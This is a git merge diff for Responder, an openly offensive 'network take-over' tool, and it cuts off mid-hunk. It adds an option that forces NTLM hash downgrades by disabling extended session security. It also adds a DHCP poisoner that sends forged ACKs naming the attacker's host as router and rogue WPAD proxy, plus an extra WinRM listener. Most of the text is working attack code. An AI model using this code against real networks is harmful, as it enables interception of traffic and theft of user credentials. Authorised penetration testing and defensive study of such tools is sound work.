Merge branch 'master' of https://github.com/lgandx/Responder

Add ESS downgrade parameter

README.md

@@ -16,7 +16,7 @@ The concept behind this is to target our answers, and be stealthier on the netwo
 
 - Built-in SMB Auth server.
 	
-Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
+Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default.
 
 - Built-in MSSQL Auth server.
 
@@ -163,6 +163,7 @@ Options:
                                 with -r. Default: Off
 	  --lm                  Force LM hashing downgrade for Windows XP/2003 and
 	                        earlier. Default: Off
+	  --disable-ess         Force ESS downgrade. Default: Off
 	  -v, --verbose         Increase verbosity.
 	
 

Responder.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
@@ -31,10 +31,9 @@ parser.add_option('-I','--interface',      action="store",      help="Network in
 parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
 
 parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
-
 parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
 parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
-parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
+parser.add_option('-d', '--DHCP',          action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False)
 parser.add_option('-f','--fingerprint',    action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
 parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
 parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
@@ -43,13 +42,14 @@ parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM
 parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
 
 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
+parser.add_option('--disable-ess',         action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
     print(color("[!] Responder must be run as root."))
     sys.exit(-1)
-elif options.OURIP is None and IsOsX() is True:
+elif options.OURIP == None and IsOsX() == True:
     print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
     parser.print_help()
     exit(-1)
@@ -61,9 +61,6 @@ StartupMessage()
 
 settings.Config.ExpandIPRanges()
 
-if settings.Config.AnalyzeMode:
-	print(color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
-
 #Create the DB, before we start Responder.
 CreateResponderDb()
 
@@ -266,6 +263,10 @@ def main():
 			from servers.WinRM import WinRM
 			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
 
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,)))
+
 		if settings.Config.SSL_On_Off:
 			from servers.HTTP import HTTP
 			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
@@ -338,8 +339,16 @@ def main():
 			thread.setDaemon(True)
 			thread.start()
 
+
 		print(color('\n[+]', 2, 1) + " Listening for events...\n")
 
+		if settings.Config.AnalyzeMode:
+			print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
+
+		if settings.Config.DHCP_On_Off:
+			from poisoners.DHCP import DHCP
+			DHCP()
+
 		while True:
 			time.sleep(1)
 

packets.py

@@ -202,6 +202,9 @@ class MDNS_Ans(Packet):
 	def calculate(self):
 		self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
 
+################### DHCP SRV ######################
+
+
 ##### HTTP Packets #####
 class NTLM_Challenge(Packet):
 	fields = OrderedDict([
@@ -791,7 +794,7 @@ class LDAPNTLMChallenge(Packet):
 		("NTLMSSPNtWorkstationLen",                   "\x1e\x00"),
 		("NTLMSSPNtWorkstationMaxLen",                "\x1e\x00"),
 		("NTLMSSPNtWorkstationBuffOffset",            "\x38\x00\x00\x00"),
-		("NTLMSSPNtNegotiateFlags",                   "\x15\x82\x89\xe2"),
+		("NTLMSSPNtNegotiateFlags",                   "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 		("NTLMSSPNtServerChallenge",                  "\x81\x22\x33\x34\x55\x46\xe7\x88"),
 		("NTLMSSPNtReserved",                         "\x00\x00\x00\x00\x00\x00\x00\x00"),
 		("NTLMSSPNtTargetInfoLen",                    "\x94\x00"),
@@ -1197,7 +1200,7 @@ class SMBNegoAns(Packet):
 		("NegHintTag0ASNLen",         "\x17"),
 		("NegHintFinalASNId",         "\x1b"),
 		("NegHintFinalASNLen",        "\x15"),
-		("NegHintFinalASNStr",        settings.Config.MachineNego),
+		("NegHintFinalASNStr",        "not_defined_in_RFC4178@please_ignore"),
 	])
 
 	def calculate(self):
@@ -1331,7 +1334,7 @@ class SMBSession1Data(Packet):
 		("NTLMSSPNtWorkstationLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
-		("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+		("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 		("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 		("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 		("NTLMSSPNtTargetInfoLen","\x94\x00"),
@@ -1576,7 +1579,7 @@ class SMB2NegoAns(Packet):
 		("NegHintTag0ASNLen",         "\x26"),
 		("NegHintFinalASNId",         "\x1b"), 
 		("NegHintFinalASNLen",        "\x24"),
-		("NegHintFinalASNStr",        settings.Config.MachineName+'@'+settings.Config.DomainName),
+		("NegHintFinalASNStr",        "not_defined_in_RFC4178@please_ignore"),
 	])
 
 	def calculate(self):
@@ -1651,7 +1654,7 @@ class SMB2Session1Data(Packet):
 		("NTLMSSPNtWorkstationLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 		("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
-		("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+		("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 		("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 		("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 		("NTLMSSPNtTargetInfoLen","\x94\x00"),
@@ -2143,3 +2146,113 @@ class RPCNTLMNego(Packet):
 
 		self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
 
+################### Mailslot NETLOGON ######################
+class NBTUDPHeader(Packet):
+    fields = OrderedDict([
+        ("MessType",      "\x11"),
+        ("MoreFrag",      "\x02"),
+        ("TID",           "\x82\x92"),
+        ("SrcIP",         "0.0.0.0"),
+        ("SrcPort",       "\x00\x8a"), ##Always 138
+        ("DatagramLen",   "\x00\x00"),
+        ("PacketOffset",  "\x00\x00"),
+        ("ClientNBTName", ""),
+        ("DstNBTName",    ""),
+        ("Data", ""),
+    ])
+
+    def calculate(self):
+        self.fields["SrcIP"] = RespondWithIPAton()
+        ## DatagramLen.
+        DataGramLen = str(self.fields["PacketOffset"])+str(self.fields["ClientNBTName"])+str(self.fields["DstNBTName"])+str(self.fields["Data"])
+        self.fields["DatagramLen"] = StructWithLenPython2or3(">h",len(DataGramLen))
+
+class SMBTransMailslot(Packet):
+    fields = OrderedDict([
+        ("Wordcount",        "\x11"),
+        ("TotalParamCount",  "\x00\x00"),
+        ("TotalDataCount",   "\x00\x00"),
+        ("MaxParamCount",    "\x02\x00"),
+        ("MaxDataCount",     "\x00\x00"),
+        ("MaxSetupCount",    "\x00"),
+        ("Reserved",         "\x00"),
+        ("Flags",            "\x00\x00"),
+        ("Timeout",          "\xff\xff\xff\xff"),
+        ("Reserved2",        "\x00\x00"),
+        ("ParamCount",       "\x00\x00"),
+        ("ParamOffset",      "\x00\x00"),
+        ("DataCount",        "\x00\x00"),
+        ("DataOffset",       "\x00\x00"),
+        ("SetupCount",       "\x03"),
+        ("Reserved3",        "\x00"),
+        ("Opcode",           "\x01\x00"),
+        ("Priority",         "\x00\x00"),
+        ("Class",            "\x02\x00"),
+        ("Bcc",              "\x00\x00"),
+        ("MailSlot",         "\\MAILSLOT\\NET\\NETLOGON"),
+        ("MailSlotNull",     "\x00"),
+        ("Padding",          "\x00\x00\x00"),
+        ("Data",             ""),
+    ])
+
+    def calculate(self):
+        #Padding
+        if len(str(self.fields["Data"]))%2==0:
+           self.fields["Padding"] = "\x00\x00\x00\x00"
+        else:
+           self.fields["Padding"] = "\x00\x00\x00"
+        BccLen = str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])+str(self.fields["Data"])
+        PacketOffsetLen = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved2"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved3"])+str(self.fields["Opcode"])+str(self.fields["Priority"])+str(self.fields["Class"])+str(self.fields["Bcc"])+str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])
+
+        self.fields["DataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
+        self.fields["TotalDataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
+        self.fields["DataOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
+        self.fields["ParamOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(BccLen))
+
+class SamLogonResponseEx(Packet):
+    fields = OrderedDict([
+        ("Cmd",               "\x17\x00"),
+        ("Sbz",               "\x00\x00"),
+        ("Flags",             "\xfd\x03\x00\x00"),
+        ("DomainGUID",        "\xe7\xfd\xf2\x4a\x4f\x98\x8b\x49\xbb\xd3\xcd\x34\xc7\xba\x57\x70"),
+        ("ForestName",        "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
+        ("ForestNameNull",    "\x00"),
+        ("ForestDomainName",  "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
+        ("ForestDomainNull",  "\x00"),
+        ("DNSName",           "\x0a\x73\x65\x72\x76\x65\x72\x32\x30\x30\x33"),
+        ("DNSPointer",        "\xc0\x18"),
+        ("DomainName",        "\x04\x53\x4d\x42\x33"),
+        ("DomainTerminator",  "\x00"),
+        ("ServerLen",         "\x0a"),
+        ("ServerName",        settings.Config.MachineName),
+        ("ServerTerminator",  "\x00"),
+        ("UsernameLen",       "\x10"),
+        ("Username",          "LGANDX"),
+        ("UserTerminator",    "\x00"),
+        ("SrvSiteNameLen",    "\x17"),
+        ("SrvSiteName",       "Default-First-Site-Name"),
+        ("SrvSiteNameNull",   "\x00"),
+        ("Pointer",           "\xc0"),
+        ("PointerOffset",     "\x5c"),
+        ("DCAddrSize",        "\x10"),
+        ("AddrType",          "\x02\x00"),
+        ("Port",              "\x00\x00"),
+        ("DCAddress",         "\xc0\xab\x01\x65"),
+        ("SinZero",           "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("Version",           "\x0d\x00\x00\x00"),
+        ("LmToken",           "\xff\xff"),
+        ("LmToken2",          "\xff\xff"),
+    ])
+
+    def calculate(self):
+        Offset = str(self.fields["Cmd"])+str(self.fields["Sbz"])+str(self.fields["Flags"])+str(self.fields["DomainGUID"])+str(self.fields["ForestName"])+str(self.fields["ForestNameNull"])+str(self.fields["ForestDomainName"])+str(self.fields["ForestDomainNull"])+str(self.fields["DNSName"])+str(self.fields["DNSPointer"])+str(self.fields["DomainName"])+str(self.fields["DomainTerminator"])+str(self.fields["ServerLen"])+str(self.fields["ServerName"])+str(self.fields["ServerTerminator"])+str(self.fields["UsernameLen"])+str(self.fields["Username"])+str(self.fields["UserTerminator"])
+
+        DcLen = str(self.fields["AddrType"])+str(self.fields["Port"])+str(self.fields["DCAddress"])+str(self.fields["SinZero"])
+        self.fields["DCAddress"] = RespondWithIPAton()
+        self.fields["ServerLen"] = StructWithLenPython2or3("<B",len(str(self.fields["ServerName"])))
+        self.fields["UsernameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["Username"])))
+        self.fields["SrvSiteNameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["SrvSiteName"])))
+        self.fields["DCAddrSize"] = StructWithLenPython2or3("<B",len(DcLen))
+        self.fields["PointerOffset"] = StructWithLenPython2or3("<B",len(Offset))
+

poisoners/DHCP.py

@@ -0,0 +1,309 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
+
+import struct
+import optparse
+import configparser
+import os
+import codecs
+import netifaces
+import binascii
+
+BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
+sys.path.insert(0, BASEDIR)
+from odict import OrderedDict
+from utils import *
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
+
+config = configparser.ConfigParser()
+config.read(os.path.join(BASEDIR,'Responder.conf'))
+RespondTo           = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
+DontRespondTo       = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
+Interface           = settings.Config.Interface
+Responder_IP        = FindLocalIP(Interface, None)
+ROUTERIP            = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
+NETMASK             = "255.255.255.0"
+DNSIP               = "0.0.0.0"
+DNSIP2              = "0.0.0.0"
+DNSNAME             = "lan"
+WPADSRV             = "http://"+Responder_IP+"/wpad.dat"
+Respond_To_Requests = True
+DHCPClient          = []
+
+def GetMacAddress(Interface):
+	mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr']
+	return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
+
+##### IP Header #####
+class IPHead(Packet):
+    fields = OrderedDict([
+            ("Version",           "\x45"),
+            ("DiffServices",      "\x00"),
+            ("TotalLen",          "\x00\x00"),
+            ("Ident",             "\x00\x00"),
+            ("Flags",             "\x00\x00"),
+            ("TTL",               "\x40"),
+            ("Protocol",          "\x11"),
+            ("Checksum",          "\x00\x00"),
+            ("SrcIP",             ""),
+            ("DstIP",             ""),
+    ])
+
+class UDP(Packet):
+    fields = OrderedDict([
+            ("SrcPort",           "\x00\x43"),
+            ("DstPort",           "\x00\x44"),
+            ("Len",               "\x00\x00"),
+            ("Checksum",          "\x00\x00"),
+            ("Data",              "\x00\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
+
+class DHCPDiscover(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x01"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               os.urandom(4).decode('latin-1')),
+            ("ElapsedSec",        "\x00\x01"),
+            ("BootpFlags",        "\x80\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         os.urandom(6).decode('latin-1')),#Needs to be random.
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x01"),              #Msgtype(Discover)
+            ("Op55",              "\x37"),
+            ("Op55Len",           "\x0b"),
+            ("Op55Str",           "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info.
+            ("Op12",              "\x0c"),
+            ("Op12Len",           "\x09"),
+            ("Op12Str",           settings.Config.DHCPHostname),#random str.
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["ClientMac"] = GetMacAddress(Interface)
+
+class DHCPACK(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op51",              "\x33"),
+            ("Op51Len",           "\x04"),
+            ("Op51Str",           "\x00\x00\x00\x0a"),  #Lease time
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             "\xfc"),
+            ("Op252Len",          "\x04"),
+            ("Op252Str",          ""),                  #Wpad Server
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Op54Str"]  = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        self.fields["Op252Str"] = WPADSRV
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+        self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
+
+def RespondToThisIP(ClientIp):
+    if ClientIp.startswith('127.0.0.'):
+        return False
+    elif RespondTo and ClientIp not in RespondTo:
+        return False
+    elif ClientIp in RespondTo or RespondTo == []:
+        if ClientIp not in DontRespondTo:
+            return True
+    return False
+
+def ParseSrcDSTAddr(data):
+    SrcIP = socket.inet_ntoa(data[0][26:30])
+    DstIP = socket.inet_ntoa(data[0][30:34])
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
+    return SrcIP, SrcPort, DstIP, DstPort
+
+def FindIP(data):
+    data = data.decode('latin-1')
+    IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
+    return ''.join(IP[0:4]).encode('latin-1')
+
+def ParseDHCPCode(data, ClientIP):
+    global DHCPClient
+    global ROUTERIP
+    PTid        = data[4:8]
+    Seconds     = data[8:10]
+    CurrentIP   = socket.inet_ntoa(data[12:16])
+    RequestedIP = socket.inet_ntoa(data[16:20])
+    MacAddr     = data[28:34]
+    MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
+    OpCode      = data[242:243]
+    RequestIP   = data[245:249]
+    
+    if DHCPClient.count(MacAddrStr) >= 4:
+    	return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
+    	
+    if OpCode == b"\x02" and Respond_To_Requests:  # DHCP Offer
+        ROUTERIP = ClientIP
+        return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
+
+    elif OpCode == b"\x03" and Respond_To_Requests:  # DHCP Request
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
+                DHCPClient.append(MacAddrStr)
+                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+    elif OpCode == b"\x01" and Respond_To_Requests:  # DHCP Discover
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
+                DHCPClient.append(MacAddrStr)
+                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+def SendDiscover():
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1'))
+	Packet = DHCPDiscover()
+	Packet.calculate()
+	Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet)
+	Buffer.calculate()
+	s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67))
+
+def SendDHCP(packet,Host):
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	s.sendto(NetworkSendBufferPython2or3(packet), Host)
+
+def DHCP():
+    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
+    s.bind((Interface, 0x0800))
+    SendDiscover()
+    while True:
+            data = s.recvfrom(65535)
+            if data[0][23:24] == b"\x11":# is udp?
+                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
+                if SrcPort == 67 or DstPort == 67:
+                    ClientIP = socket.inet_ntoa(data[0][26:30])
+                    ret = ParseDHCPCode(data[0][42:], ClientIP)
+                    if ret:
+                        print(text("[*] [DHCP] %s" % ret))

servers/DNS.py

@@ -39,14 +39,14 @@ class DNS(BaseRequestHandler):
 
 		try:
 			data, soc = self.request
-			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode == False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A" and settings.Config.AnalyzeMode == False:
 				buff = DNS_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
 				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
 
-			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV" and settings.Config.AnalyzeMode == False:
 				buff = DNS_SRV_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
@@ -65,14 +65,14 @@ class DNSTCP(BaseRequestHandler):
 	
 		try:
 			data = self.request.recv(1024)
-			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode is False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A" and settings.Config.AnalyzeMode is False:
 				buff = DNS_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
 				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
 
-			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV" and settings.Config.AnalyzeMode == False:
 				buff = DNS_SRV_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))

servers/LDAP.py

@@ -40,11 +40,11 @@ def CalculateDNSName(name):
 def ParseCLDAPNetlogon(data):
 	try:
 		Dns = data.find(b'DnsDomain')
-		if Dns is -1:
+		if Dns == -1:
 			return False
 		DnsName = data[Dns+9:]
 		DnsGuidOff = data.find(b'DomainGuid')
-		if DnsGuidOff is -1:
+		if DnsGuidOff == -1:
 			return False
 		Guid = data[DnsGuidOff+10:]
 		if Dns:
@@ -72,13 +72,13 @@ def ParseSearch(data):
 		t.calculate()
 		return str(t)
 
-	elif re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
